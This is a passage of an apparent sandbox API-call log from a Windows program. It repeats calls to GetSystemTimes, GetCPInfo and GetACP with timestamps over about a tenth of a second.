lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.035] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.035] GetACP () returned 0x4e4 [0083.035] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.036] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.036] GetACP () returned 0x4e4 [0083.036] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.036] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.036] GetACP () returned 0x4e4 [0083.036] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.036] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.036] GetACP () returned 0x4e4 [0083.036] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.036] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.036] GetACP () returned 0x4e4 [0083.036] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.036] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.036] GetACP () returned 0x4e4 [0083.036] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.036] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.037] GetACP () returned 0x4e4 [0083.037] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.037] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.037] GetACP () returned 0x4e4 [0083.037] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.037] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.037] GetACP () returned 0x4e4 [0083.037] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.037] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.037] GetACP () returned 0x4e4 [0083.037] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.037] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.037] GetACP () returned 0x4e4 [0083.037] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.037] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.037] GetACP () returned 0x4e4 [0083.037] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.037] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.038] GetACP () returned 0x4e4 [0083.038] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.038] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.038] GetACP () returned 0x4e4 [0083.038] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.038] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.038] GetACP () returned 0x4e4 [0083.038] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.038] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.038] GetACP () returned 0x4e4 [0083.038] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.038] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.038] GetACP () returned 0x4e4 [0083.038] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.038] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.038] GetACP () returned 0x4e4 [0083.038] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.038] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.039] GetACP () returned 0x4e4 [0083.039] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.039] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.039] GetACP () returned 0x4e4 [0083.039] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.039] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.039] GetACP () returned 0x4e4 [0083.039] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.039] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.039] GetACP () returned 0x4e4 [0083.039] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.039] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.039] GetACP () returned 0x4e4 [0083.039] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.039] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.039] GetACP () returned 0x4e4 [0083.039] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.039] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.039] GetACP () returned 0x4e4 [0083.039] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.040] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.040] GetACP () returned 0x4e4 [0083.040] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.040] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.040] GetACP () returned 0x4e4 [0083.040] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.040] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.040] GetACP () returned 0x4e4 [0083.040] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.040] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.040] GetACP () returned 0x4e4 [0083.040] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.040] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.040] GetACP () returned 0x4e4 [0083.040] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.040] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.040] GetACP () returned 0x4e4 [0083.041] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.041] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.041] GetACP () returned 0x4e4 [0083.041] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.041] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.041] GetACP () returned 0x4e4 [0083.041] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.041] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.041] GetACP () returned 0x4e4 [0083.041] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.041] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.041] GetACP () returned 0x4e4 [0083.041] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.041] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.041] GetACP () returned 0x4e4 [0083.041] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.042] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.042] GetACP () returned 0x4e4 [0083.042] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.042] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.042] GetACP () returned 0x4e4 [0083.042] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.042] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.042] GetACP () returned 0x4e4 [0083.042] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.042] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.042] GetACP () returned 0x4e4 [0083.042] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.042] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.042] GetACP () returned 0x4e4 [0083.042] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.042] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.042] GetACP () returned 0x4e4 [0083.042] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.043] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.043] GetACP () returned 0x4e4 [0083.043] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.043] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.043] GetACP () returned 0x4e4 [0083.043] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.043] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.043] GetACP () returned 0x4e4 [0083.043] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.043] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.043] GetACP () returned 0x4e4 [0083.043] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.043] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.043] GetACP () returned 0x4e4 [0083.043] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.043] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.043] GetACP () returned 0x4e4 [0083.043] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.044] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.044] GetACP () returned 0x4e4 [0083.044] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.044] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.044] GetACP () returned 0x4e4 [0083.044] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.044] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.044] GetACP () returned 0x4e4 [0083.044] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.044] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.044] GetACP () returned 0x4e4 [0083.044] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.044] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.044] GetACP () returned 0x4e4 [0083.044] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.044] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.044] GetACP () returned 0x4e4 [0083.044] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.044] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.045] GetACP () returned 0x4e4 [0083.045] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.045] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.045] GetACP () returned 0x4e4 [0083.045] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.045] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.045] GetACP () returned 0x4e4 [0083.045] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.045] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.045] GetACP () returned 0x4e4 [0083.045] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.045] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.045] GetACP () returned 0x4e4 [0083.045] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.045] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.045] GetACP () returned 0x4e4 [0083.045] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.045] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.045] GetACP () returned 0x4e4 [0083.045] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.046] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.046] GetACP () returned 0x4e4 [0083.046] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.046] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.046] GetACP () returned 0x4e4 [0083.046] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.046] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.046] GetACP () returned 0x4e4 [0083.046] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.046] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.046] GetACP () returned 0x4e4 [0083.046] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.046] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.046] GetACP () returned 0x4e4 [0083.046] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.046] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.046] GetACP () returned 0x4e4 [0083.046] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.127] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.127] GetACP () returned 0x4e4 [0083.127] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.128] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.128] GetACP () returned 0x4e4 [0083.128] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.128] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.128] GetACP () returned 0x4e4 [0083.128] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.128] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.128] GetACP () returned 0x4e4 [0083.128] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.128] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.128] GetACP () returned 0x4e4 [0083.128] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.128] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.128] GetACP () returned 0x4e4 [0083.128] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.128] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.128] GetACP () returned 0x4e4 [0083.128] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.129] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.129] GetACP () returned 0x4e4 [0083.129] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.129] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.129] GetACP () returned 0x4e4 [0083.129] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.129] 